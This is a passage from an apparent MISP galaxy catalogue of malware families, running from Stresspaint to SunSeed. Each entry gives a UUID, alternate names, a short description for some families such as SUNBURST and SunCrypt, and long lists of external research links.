- https://cert-agid.gov.it/news/analisi-tecnica-e-considerazioni-sul-malware-strela/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stresspaint
Internal MISP references
UUID 00dedcea-4f87-4b6d-b12d-7749281b1366
which can be used as unique global reference for Stresspaint
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint - webarchive
- https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/ - webarchive
- https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/ - webarchive
- https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/ - webarchive
- https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StrifeWater RAT
Internal MISP references
UUID 5627aff2-7e1d-4b11-81f5-33cd7febdd76
which can be used as unique global reference for StrifeWater RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat - webarchive
- https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff - webarchive
- https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations - webarchive
- https://securelist.com/a-hack-in-hand-is-worth-two-in-the-bush/110794/ - webarchive
- https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StrikeSuit Gift
Internal MISP references
UUID ec2a5a29-a142-447c-85b9-ec47e78f9cb2
which can be used as unique global reference for StrikeSuit Gift
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.strikesuit_gift - webarchive
- https://assets.stairwell.com/hubfs/Marketing-Assets/Stairwell-threat-report-The-origin-of-APT32-macros.pdf - webarchive
- https://ti.qianxin.com/blog/articles/english-version-of-new-approaches-utilized-by-oceanLotus-to-target-vietnamese-environmentalist/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
StrongPity
According to Mitre, StrongPity is an information stealing malware used by PROMETHIUM.
Internal MISP references
UUID da2969f2-01e9-4ca8-b2f3-5fc9a9891d57
which can be used as unique global reference for StrongPity
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity - webarchive
- https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html - webarchive
- https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/ - webarchive
- https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/ - webarchive
- https://blog.minerva-labs.com/a-new-strongpity-variant-hides-behind-notepad-installation - webarchive
- https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/ - webarchive
- https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg - webarchive
- https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/ - webarchive
- https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/ - webarchive
- https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara - webarchive
- https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA - webarchive
- https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4 - webarchive
- https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://blogs.blackberry.com/en/2021/11/zebra2104 - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf - webarchive
- https://twitter.com/physicaldrive0/status/786293008278970368 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stuxnet
Internal MISP references
UUID 6ad84f52-0025-4a9d-861a-65c870f47988
which can be used as unique global reference for Stuxnet
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet - webarchive
- https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf - webarchive
- https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf - webarchive
- http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html - webarchive
- https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf - webarchive
- https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147 - webarchive
- https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet - webarchive
- https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001 - webarchive
- https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf - webarchive
- https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf - webarchive
- https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html - webarchive
- https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf - webarchive
- https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security - webarchive
- https://web.archive.org/web/20230416140914if_/http://www.chinaview.cn/20230411/4e0fa0f4fd1d408aaddeef8be63a4757/202304114e0fa0f4fd1d408aaddeef8be63a4757_20230411161526_0531.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper - webarchive
- https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Subzero
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Subzero.
Known Synonyms |
---|
Corelump |
Jumplump |
Internal MISP references
UUID 72fb9dd2-33bf-4620-bf03-92630d7da101
which can be used as unique global reference for Subzero
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.subzero - webarchive
- https://cdn.netzpolitik.org/wp-upload/2021/12/2018-08-28_DSIRF_Company-Profile-Gov.redacted.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ - webarchive
- https://netzpolitik.org/2021/dsirf-wir-enthuellen-den-staatstrojaner-subzero-aus-oesterreich/ - webarchive
- https://socradar.io/threats-of-commercialized-malware-knotweed/ - webarchive
- https://www.focus.de/politik/vorab-aus-dem-focus-volle-kontrolle-ueber-zielcomputer-das-raetsel-um-die-spionage-app-fuehrt-ueber-wirecard-zu-putin_id_24442733.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SUCEFUL
Internal MISP references
UUID efe586da-a272-4898-9ebb-587f8f5a23ca
which can be used as unique global reference for SUCEFUL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Sugar
Ransomware, written in Delphi.
Internal MISP references
UUID ea7d0457-3625-4224-aed4-739a360b10d3
which can be used as unique global reference for Sugar
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sugar - webarchive
- https://medium.com/s2wblog/tracking-sugarlocker-ransomware-3a3492353c49 - webarchive
- https://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb - webarchive
- https://cyware.com/news/newly-found-sugar-ransomware-is-now-being-offered-as-raas-641cfa69 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SUGARDUMP
According to Mandiant, SUGARDUMP is a credential harvesting utility, capable of password collection from Chromium-based browsers. There are also versions to exfiltrate data via SMTP and HTTP.
Internal MISP references
UUID 655c3dbb-8d2c-4613-8722-ec12b24d5956
which can be used as unique global reference for SUGARDUMP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SUGARRUSH
According to Mandiant, SUGARUSH is a backdoor written to establish a connection with an embedded C2 and to execute CMD commands.
Internal MISP references
UUID 129163aa-8539-40ee-a627-0ac6775697b5
which can be used as unique global reference for SUGARRUSH
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SUNBURST
FireEye describes SUNBURST as a trojanized, digitally signed SolarWinds component of the Orion software framework that contains a backdoor communicating via HTTP to third-party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications, namely the Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanized updates were digitally signed from March to May 2020 and posted to the SolarWinds updates website.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular SUNBURST.
Known Synonyms |
---|
Solorigate |
Internal MISP references
UUID 34e50688-6955-4c28-8e18-50252e5ea711
which can be used as unique global reference for SUNBURST
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst - webarchive
- https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-008a - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/ - webarchive
- https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst - webarchive
- https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-352a - webarchive
- https://www.mandiant.com/resources/unc2452-merged-into-apt29 - webarchive
- https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/ - webarchive
- https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610 - webarchive
- https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth - webarchive
- https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947 - webarchive
- https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug - webarchive
- https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/ - webarchive
- https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/ - webarchive
- https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf - webarchive
- https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update - webarchive
- https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/ - webarchive
- https://netresec.com/?b=212a6ad - webarchive
- https://www.youtube.com/watch?v=dV2QTLSecpc - webarchive
- https://twitter.com/cybercdh/status/1338975171093336067 - webarchive
- https://www.fireeye.com/current-threats/sunburst-malware.html - webarchive
- https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/ - webarchive
- https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/ - webarchive
- https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html - webarchive
- https://www.brighttalk.com/webcast/7451/462719 - webarchive
- https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/ - webarchive
- https://netresec.com/?b=2113a6a - webarchive
- https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs - webarchive
- https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/ - webarchive
- https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/ - webarchive
- https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/ - webarchive
- https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons - webarchive
- https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/ - webarchive
- https://www.brighttalk.com/webcast/7451/469525 - webarchive
- https://www.youtube.com/watch?v=mbGN1xqy1jY - webarchive
- https://twitter.com/cybercdh/status/1339241246024404994 - webarchive
- https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/ - webarchive
- https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html - webarchive
- https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/ - webarchive
- https://twitter.com/lordx64/status/1338526166051934213 - webarchive
- https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/ - webarchive
- https://twitter.com/Intel471Inc/status/1339233255741120513 - webarchive
- https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q - webarchive
- https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf - webarchive
- https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga - webarchive
- https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign - webarchive
- https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/ - webarchive
- https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html - webarchive
- https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/ - webarchive
- https://www.cadosecurity.com/post/responding-to-solarigate - webarchive
- https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling - webarchive
- https://youtu.be/SW8kVkwDOrc?t=24706 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.youtube.com/watch?v=-Vsgmw2G4Wo - webarchive
- https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json - webarchive
- https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software - webarchive
- https://github.com/SentineLabs/SolarWinds_Countermeasures - webarchive
- https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ - webarchive
- https://twitter.com/megabeets_/status/1339308801112027138 - webarchive
- https://www.youtube.com/watch?v=GfbxHy6xnbA - webarchive
- https://www.youtube.com/watch?v=LA-XE5Jy2kU - webarchive
- https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/ - webarchive
- https://netresec.com/?b=211cd21 - webarchive
- https://pastebin.com/6EDgCKxd - webarchive
- https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/ - webarchive
- https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html - webarchive
- https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en - webarchive
- https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/ - webarchive
- https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control - webarchive
- https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/ - webarchive
- https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation - webarchive
- https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html - webarchive
- https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack - webarchive
- https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://twitter.com/cybercdh/status/1338885244246765569 - webarchive
- https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/ - webarchive
- https://www.solarwinds.com/securityadvisory - webarchive
- https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html - webarchive
- https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a - webarchive
- https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html - webarchive
- https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware - webarchive
- https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718 - webarchive
- https://twitter.com/ItsReallyNick/status/1338382939835478016 - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-077a - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate - webarchive
- https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha - webarchive
- https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html - webarchive
- https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/ - webarchive
- https://www.mimecast.com/blog/important-security-update/ - webarchive
- https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/ - webarchive
- https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/ - webarchive
- https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance - webarchive
- https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f - webarchive
- https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data - webarchive
- https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/ - webarchive
- https://securelist.com/sunburst-backdoor-kazuar/99981/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds - webarchive
- https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714 - webarchive
- https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095 - webarchive
- https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/ - webarchive
- https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware - webarchive
- https://www.mimecast.com/incident-report/ - webarchive
- https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/ - webarchive
- https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities - webarchive
- https://github.com/cisagov/CHIRP - webarchive
- https://github.com/fireeye/Mandiant-Azure-AD-Investigator - webarchive
- https://github.com/sophos-cybersecurity/solarwinds-threathunt - webarchive
- https://www.4hou.com/posts/KzZR - webarchive
- https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection - webarchive
- https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar - webarchive
- https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident - webarchive
- https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306 - webarchive
- https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more - webarchive
- https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure - webarchive
- https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html - webarchive
- https://community.riskiq.com/article/9a515637 - webarchive
- https://netresec.com/?b=211f30f - webarchive
- https://github.com/fireeye/sunburst_countermeasures - webarchive
- https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline - webarchive
- https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html - webarchive
- https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators# - webarchive
- https://www.sans.org/webcasts/contrarian-view-solarwinds-119515 - webarchive
- https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/solarphoenix/ - webarchive
- https://github.com/RedDrip7/SunBurst_DGA_Decode - webarchive
- https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards - webarchive
- https://twitter.com/0xrb/status/1339199268146442241 - webarchive
- https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/ - webarchive
- https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution - webarchive
- https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf - webarchive
- https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/ - webarchive
- https://www.mandiant.com/media/10916/download - webarchive
- https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/ - webarchive
- https://www.cisa.gov/supply-chain-compromise - webarchive
- https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/ - webarchive
- https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS - webarchive
- https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/ - webarchive
- https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view - webarchive
- https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response - webarchive
- https://us-cert.cisa.gov/remediating-apt-compromised-networks - webarchive
- https://www.youtube.com/watch?v=cMauHTV-lJg - webarchive
- https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/ - webarchive
- https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/ - webarchive
- https://www.solarwinds.com/securityadvisory/faq - webarchive
- https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/ - webarchive
- https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/ - webarchive
- https://twitter.com/FireEye/status/1339295983583244302 - webarchive
- https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a - webarchive
- https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html - webarchive
- https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack - webarchive
- https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm - webarchive
- https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ - webarchive
- https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/ - webarchive
- https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html - webarchive
- https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack - webarchive
- https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack - webarchive
- https://www.youtube.com/watch?v=JoMwrkijTZ8 - webarchive
- https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf - webarchive
- https://www.comae.com/posts/sunburst-memory-analysis/ - webarchive
- https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/ - webarchive
- https://twitter.com/KimZetter/status/1338305089597964290 - webarchive
- https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection - webarchive
- https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc - webarchive
- https://youtu.be/Ta_vatZ24Cs?t=59 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SunCrypt
According to PCrisk, Suncrypt ransomware prevents victims from accessing files by encryption. It also renames all encrypted files and creates a ransom message. It renames encrypted files by appending a string of random characters as the new extension.
Internal MISP references
UUID 018fb88b-a3cd-46b7-adea-a5b85302715b
which can be used as unique global reference for SunCrypt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://cdn.pathfactory.com/assets/10555/contents/394789/0dd521f8-aa64-4517-834e-bc852e9ab95d.pdf - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a - webarchive
- https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/ - webarchive
- https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/ - webarchive
- https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/ - webarchive
- https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer - webarchive
- https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022 - webarchive
- https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion - webarchive
- https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/ - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel - webarchive
- https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83 - webarchive
- https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt - webarchive
- https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SunOrcal
Internal MISP references
UUID a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4
which can be used as unique global reference for SunOrcal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SunSeed
